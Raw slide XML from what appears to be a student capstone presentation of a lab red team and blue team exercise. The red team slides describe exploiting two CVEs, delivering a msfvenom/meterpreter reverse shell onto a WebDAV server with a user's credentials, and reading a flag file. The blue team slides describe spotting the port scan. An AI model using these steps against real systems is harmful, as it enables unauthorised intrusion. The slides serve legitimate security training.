              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Established a remote listener on the Capstone Apache server</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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37" name="Google Shape;1137;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;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40" name="Google Shape;1140;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1" name="Google Shape;1141;p63"/>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3"/>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Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created a reverse shell and using Ryan’s credentials moved the shell into the webdav server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Once meterpreter was open, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> pwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>d /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>s –a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>at flag.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;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45" name="Google Shape;1145;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1146;p63"/>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Graphical user interface, text, chat or text message&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D96175E-2E09-EE8F-639F-4206415A7615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6048227" y="1421383"/>
            <a:ext cx="2796214" cy="1231557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A874005-C65F-DFB9-163F-94F6F210E61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5813196" y="2614435"/>
            <a:ext cx="3266275" cy="2119190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE428769-7173-9F64-7036-E9922EFBD07B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4106416" y="4028967"/>
            <a:ext cx="1706780" cy="64058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Exploitation: R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verse Shell Backdoor CVE-2019-13386</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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33" name="Google Shape;1133;p63"/>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5" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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rgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1137" name="Google Shape;1137;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Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7647FEB-791F-CCED-D1E1-FF50BD0C22FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457181" y="1421382"/>
            <a:ext cx="3839794" cy="1150367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B8645A5-F3C2-3EB7-A608-3A4B07502D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4373163" y="1421383"/>
            <a:ext cx="4672061" cy="3411209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1181181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Exploitation: Local File Inclusion CVE-2021-31783</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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33" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2347846" cy="1506026"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2295150" cy="1446772"/>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Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to deliver a payload onto the vulnerable machine</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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37" name="Google Shape;1137;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457171" y="2979337"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;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rgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140" name="Google Shape;1140;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1" name="Google Shape;1141;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="697927" y="3512817"/>
            <a:ext cx="2347846" cy="1374408"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643621" y="3483037"/>
            <a:ext cx="2428500" cy="1374408"/>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Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What did the exploit achieve? For example: Did it grant you a user shell, root access, etc.?</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3706964" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;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45" name="Google Shape;1145;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Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B8DADF-5414-25A3-D65F-5612079D772C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3839149" y="1470132"/>
            <a:ext cx="4465464" cy="3373906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1118305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pic>
        <p:nvPicPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">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154" name="Google Shape;1154;p6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17</a:t>
            </a:fld>
            <a:endParaRPr sz="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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p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63" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="199150" y="580225"/>
            <a:ext cx="8636226"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200" dirty="0"/>
              <a:t>The scan occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>ed on July 12, 2022 @ 02:30 and 02:50</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>There were 263,664 packets sent from 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>We can observe the responses that the victim sent back with response Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>The file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> was requested and returned</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="308624" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BED1328A-0552-4F1C-8062-679ABCB7FCBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="593237" y="1421274"/>
            <a:ext cx="7848052" cy="1851539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
